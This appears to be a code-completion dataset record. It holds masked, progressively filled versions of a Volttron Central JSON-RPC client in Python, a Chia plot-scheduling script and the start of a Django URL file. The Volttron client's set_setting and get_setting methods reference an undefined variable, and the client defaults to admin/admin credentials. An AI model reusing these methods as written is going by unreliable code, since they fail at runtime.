"step-3": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the 
setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization', username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance', discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' 
+ platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc('set_setting', key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
"step-5": "# -*- coding: utf-8 -*- {{{\n# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:\n\n# Copyright (c) 2017, Battelle Memorial Institute\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation\n# are those of the authors and should not be interpreted as representing\n# official policies, either expressed or implied, of the FreeBSD\n# Project.\n#\n# This material was prepared as an account of work sponsored by an\n# agency of the United States Government. Neither the United States\n# Government nor the United States Department of Energy, nor Battelle,\n# nor any of their employees, nor any jurisdiction or organization that\n# has cooperated in the development of these materials, makes any\n# warranty, express or implied, or assumes any legal liability or\n# responsibility for the accuracy, completeness, or usefulness or any\n# information, apparatus, product, software, or process disclosed, or\n# represents that its use would not infringe privately owned rights.\n#\n# Reference herein to any specific commercial product, process, or\n# service by trade name, trademark, manufacturer, or otherwise does not\n# necessarily constitute or imply its endorsement, recommendation, or\n# favoring by the United States Government or any agency thereof, or\n# Battelle Memorial Institute. The views and opinions of authors\n# expressed herein do not necessarily state or reflect those of the\n# United States Government or any agency thereof.\n#\n# PACIFIC NORTHWEST NATIONAL LABORATORY\n# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY\n# under Contract DE-AC05-76RL01830\n\n# }}}\n\nimport requests\n\n\"\"\"\nThis example exposes the VOLTTRON web API\nthrough a python class that that does not depend\non VOLTTRON proper. 
A VOLTTRON Central Agent must\nbe running on the url passed to the constructor.\n\"\"\"\n\nclass VolttronWebRPC(object):\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {\n 'jsonrpc': '2.0',\n 'method': method,\n 'params': params,\n 'authorization': self._auth_token,\n 'id': '1'\n }\n\n r = requests.post(self._url, json=data)\n validate_response(r)\n\n return r.json()['result']\n\n def get_auth_token(self):\n \"\"\"\n Get an authorization token from Volttron Central,\n automatically called when the object is created\n \"\"\"\n return self.do_rpc('get_authorization',\n username=self._username,\n password=self._password)\n\n def register_instance(self, addr, name=None):\n \"\"\"\n Register a platform with Volttron Central\n\n :param addr: Platform's discovery address that will be registered\n \"\"\"\n return self.do_rpc('register_instance',discovery_address=addr,\n display_name=name)\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' 
+ platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type=\"json\"):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw_contents=raw_contents,\n config_type=config_type)\n return self.do_rpc(\"store_agent_config\", **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity)\n return self.do_rpc(\"list_agent_configs\", **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid,\n agent_identity=agent_identity,\n config_name=config_name,\n raw=raw)\n return self.do_rpc(\"get_agent_config\", **params)\n\n def set_setting(self, setting, value):\n \"\"\"\n Assign a value to a setting in Volttron Central\n \n :param setting: Name of the setting to set\n :param value: Value to assign to setting\n \"\"\"\n return self.do_rpc(\"set_setting\", key=key, value=value)\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc(\"get_setting\", key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc(\"get_setting_keys\")\n\n\ndef validate_response(response):\n \"\"\"\n Validate that the message is a json-rpc response.\n\n :param response:\n :return:\n \"\"\"\n assert response.ok\n rpcdict = response.json()\n assert rpcdict['jsonrpc'] == '2.0'\n assert rpcdict['id']\n assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()\n",
"step-ids": [
11,
12,
14,
15,
18
]
}
|
[
11,
12,
14,
15,
18
] |
import os
import time
import uuid
import subprocess
# Global variables. ADJUST THEM TO YOUR NEEDS
chia_executable = os.path.expanduser('~')+"/chia-blockchain/venv/bin/chia" # directory of chia binary file
numberOfLogicalCores = 16 # number of logical cores that you want to use overall
run_loop_interval = 10 # seconds of delay before this algorithm executes another loop
refresh_logs_interval = 10 # seconds of delay before this algorithm will try to re-read all logs after adding plot
logs_location = os.path.expanduser('~')+"/.chia/mainnet/plotter/" # location of the log files. Remove all corrupted and interrupted log files!
string_contained_in_all_logs = ".txt" # shared part of the name of all the log files (all logfiles must have it!)
phase_one_finished = "Time for phase 1 =" # part of the log file that means 1/2 core should be freed
phase_four_finished = "Time for phase 4 =" # part of the log file that means 2/2 core should be freed
temporary_directory = "/srv/chia/plots/" # temporary plotting directory
final_directory = "/mnt/chia/plots/" # final plot destination
farmer_public_key = "8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2" # change to your key
pool_public_key = "907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1" # change to your key
# Functions
def fetch_file_content(file_path):
if not os.path.isfile(file_path):
print('File does not exist.')
else:
with open(file_path) as file:
return file.readlines()
def fetch_logs():
item_in_location_list = os.listdir(logs_location)
content_path_list = list(map(lambda log: logs_location + log, item_in_location_list))
text_file_list = list(filter(lambda path: string_contained_in_all_logs in path, content_path_list))
logs_content = list(map(fetch_file_content, text_file_list))
return logs_content
def count_used_cores(logs):
print("===START COUNTING===")
used_cores_counter = 0
for (index, log) in enumerate(logs):
print(f"Starting log #{index}")
print("Potentially it's still in phase one assigning 4 cores")
used_cores_counter += 4
for line in log:
if phase_one_finished in line:
print("Phase one was finished in the log, deallocating two cores")
used_cores_counter -= 2
if phase_four_finished in line:
print("Phase four was finished in the log, deallocating two cores")
used_cores_counter -= 2
print(f"===FINISH COUNTING: {used_cores_counter} USED CORES===")
return used_cores_counter
def use_all_cores():
log_list = fetch_logs()
cores_used = count_used_cores(log_list)
    while numberOfLogicalCores >= cores_used + 4:
print("There are four cores free, adding new plot!")
add_plot()
time.sleep(refresh_logs_interval)
log_list = fetch_logs()
cores_used = count_used_cores(log_list)
def add_plot():
    # Use the configured directories and keys (-f/-p are chia's farmer/pool
    # public key flags) instead of hard-coded paths
    command = (f"{chia_executable} plots create -k 32 -b 3724 -n 1 -r4"
               f" -t {temporary_directory} -2 {temporary_directory}"
               f" -d {final_directory} -f {farmer_public_key} -p {pool_public_key} &")
unique_filename = str(uuid.uuid4())
new_log_file_path = f"{logs_location}/{unique_filename}{string_contained_in_all_logs}"
with open(new_log_file_path, "w") as file:
subprocess.run(command, shell=True, stdout=file)
def run_loop():
while True:
use_all_cores()
time.sleep(run_loop_interval)
# Entry point
run_loop()
|
normal
|
{
"blob_id": "bc536440a8982d2d4a1bc5809c0d9bab5ac6553a",
"index": 2313,
"step-1": "<mask token>\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\n<mask token>\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = (\n f'{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &'\n )\n unique_filename = str(uuid.uuid4())\n new_log_file_path = (\n f'{logs_location}/{unique_filename}{string_contained_in_all_logs}')\n with open(new_log_file_path, 'w') as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\n<mask token>\n",
"step-3": "<mask token>\nchia_executable = os.path.expanduser('~') + '/chia-blockchain/venv/bin/chia'\nnumberOfLogicalCores = 16\nrun_loop_interval = 10\nrefresh_logs_interval = 10\nlogs_location = os.path.expanduser('~') + '/.chia/mainnet/plotter/'\nstring_contained_in_all_logs = '.txt'\nphase_one_finished = 'Time for phase 1 ='\nphase_four_finished = 'Time for phase 4 ='\ntemporary_directory = '/srv/chia/plots/'\nfinal_directory = '/mnt/chia/plots/'\nfarmer_public_key = (\n '8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2'\n )\npool_public_key = (\n '907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1'\n )\n\n\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = (\n f'{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &'\n )\n unique_filename = str(uuid.uuid4())\n new_log_file_path = (\n f'{logs_location}/{unique_filename}{string_contained_in_all_logs}')\n with open(new_log_file_path, 'w') as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\nrun_loop()\n",
"step-4": "import os\nimport time\nimport uuid\nimport subprocess\nchia_executable = os.path.expanduser('~') + '/chia-blockchain/venv/bin/chia'\nnumberOfLogicalCores = 16\nrun_loop_interval = 10\nrefresh_logs_interval = 10\nlogs_location = os.path.expanduser('~') + '/.chia/mainnet/plotter/'\nstring_contained_in_all_logs = '.txt'\nphase_one_finished = 'Time for phase 1 ='\nphase_four_finished = 'Time for phase 4 ='\ntemporary_directory = '/srv/chia/plots/'\nfinal_directory = '/mnt/chia/plots/'\nfarmer_public_key = (\n '8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2'\n )\npool_public_key = (\n '907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1'\n )\n\n\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log,\n item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in\n path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print('===START COUNTING===')\n used_cores_counter = 0\n for index, log in enumerate(logs):\n print(f'Starting log #{index}')\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\n 'Phase one was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\n 'Phase four was finished in the log, deallocating two cores'\n )\n used_cores_counter -= 2\n print(f'===FINISH COUNTING: {used_cores_counter} USED CORES===')\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used + 1:\n print('There are four cores free, adding new plot!')\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = (\n f'{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &'\n )\n unique_filename = str(uuid.uuid4())\n new_log_file_path = (\n f'{logs_location}/{unique_filename}{string_contained_in_all_logs}')\n with open(new_log_file_path, 'w') as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\nrun_loop()\n",
"step-5": "import os\nimport time\nimport uuid\nimport subprocess\n\n# Global variables. ADJUST THEM TO YOUR NEEDS\nchia_executable = os.path.expanduser('~')+\"/chia-blockchain/venv/bin/chia\" # directory of chia binary file\nnumberOfLogicalCores = 16 # number of logical cores that you want to use overall\nrun_loop_interval = 10 # seconds of delay before this algorithm executes another loop\nrefresh_logs_interval = 10 # seconds of delay before this algorithm will try to re-read all logs after adding plot\nlogs_location = os.path.expanduser('~')+\"/.chia/mainnet/plotter/\" # location of the log files. Remove all corrupted and interrupted log files!\nstring_contained_in_all_logs = \".txt\" # shared part of the name of all the log files (all logfiles must have it!)\nphase_one_finished = \"Time for phase 1 =\" # part of the log file that means 1/2 core should be freed\nphase_four_finished = \"Time for phase 4 =\" # part of the log file that means 2/2 core should be freed\ntemporary_directory = \"/srv/chia/plots/\" # plotting final destination\nfinal_directory = \"/mnt/chia/plots/\" # plotting directory\nfarmer_public_key = \"8536d991e929298b79570ad16ee1150d3905121a44251eda3740f550fcb4285578a2a22448a406c5e73c2e9d77cd7eb2\" # change to your key\npool_public_key = \"907f125022f2b5bf75ea5ef1f108b0c9110931891a043f421837ba6edcaa976920c5b2c5ba8ffdfb00c0bd71e7b5a2b1\" # change to your key\n\n\n# Functions\ndef fetch_file_content(file_path):\n if not os.path.isfile(file_path):\n print('File does not exist.')\n else:\n with open(file_path) as file:\n return file.readlines()\n\n\ndef fetch_logs():\n item_in_location_list = os.listdir(logs_location)\n content_path_list = list(map(lambda log: logs_location + log, item_in_location_list))\n text_file_list = list(filter(lambda path: string_contained_in_all_logs in path, content_path_list))\n logs_content = list(map(fetch_file_content, text_file_list))\n return logs_content\n\n\ndef count_used_cores(logs):\n print(\"===START COUNTING===\")\n used_cores_counter = 0\n for (index, log) in enumerate(logs):\n print(f\"Starting log #{index}\")\n print(\"Potentially it's still in phase one assigning 4 cores\")\n used_cores_counter += 4\n for line in log:\n if phase_one_finished in line:\n print(\"Phase one was finished in the log, deallocating two cores\")\n used_cores_counter -= 2\n if phase_four_finished in line:\n print(\"Phase four was finished in the log, deallocating two cores\")\n used_cores_counter -= 2\n print(f\"===FINISH COUNTING: {used_cores_counter} USED CORES===\")\n return used_cores_counter\n\n\ndef use_all_cores():\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n while numberOfLogicalCores > cores_used +1:\n print(\"There are four cores free, adding new plot!\")\n add_plot()\n time.sleep(refresh_logs_interval)\n log_list = fetch_logs()\n cores_used = count_used_cores(log_list)\n\n\ndef add_plot():\n command = f\"{chia_executable} plots create -k 32 -b 3724 -n 1 -r4 -t /srv/chia/plots/ -2 /srv/chia/plots/ -d /mnt/chia/plots &\"\n unique_filename = str(uuid.uuid4())\n new_log_file_path = f\"{logs_location}/{unique_filename}{string_contained_in_all_logs}\"\n with open(new_log_file_path, \"w\") as file:\n subprocess.run(command, shell=True, stdout=file)\n\n\ndef run_loop():\n while True:\n use_all_cores()\n time.sleep(run_loop_interval)\n\n\n# Entry point\nrun_loop()\n",
"step-ids": [
4,
6,
8,
9,
10
]
}
|
[
4,
6,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [url('^$', TemplateView.as_view(template_name=
'visitor/landing-index.html'), name='landing_index'), url('^about$',
TemplateView.as_view(template_name='visitor/landing-about.html'), name=
'landing_about'), url('^terms/$', TemplateView.as_view(template_name=
'visitor/terms.html'), name='website_terms'), url('^contact$',
TemplateView.as_view(template_name='visitor/contact.html'), name=
'website_contact'), url('^accounts/', include('allauth.urls')), url(
'^accounts/profile/$', account_profile, name='account_profile'), url(
'^member/$', member_index, name='user_home'), url('^member/action$',
member_action, name='user_action'), url('^admin/', admin.site.urls)
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
from django.conf.urls.static import static
from django.conf import settings
from .auth.views import account_profile
from .views import member_index, member_action
urlpatterns = [url('^$', TemplateView.as_view(template_name=
'visitor/landing-index.html'), name='landing_index'), url('^about$',
TemplateView.as_view(template_name='visitor/landing-about.html'), name=
'landing_about'), url('^terms/$', TemplateView.as_view(template_name=
'visitor/terms.html'), name='website_terms'), url('^contact$',
TemplateView.as_view(template_name='visitor/contact.html'), name=
'website_contact'), url('^accounts/', include('allauth.urls')), url(
'^accounts/profile/$', account_profile, name='account_profile'), url(
'^member/$', member_index, name='user_home'), url('^member/action$',
member_action, name='user_action'), url('^admin/', admin.site.urls)
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<|reserved_special_token_1|>
"""URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
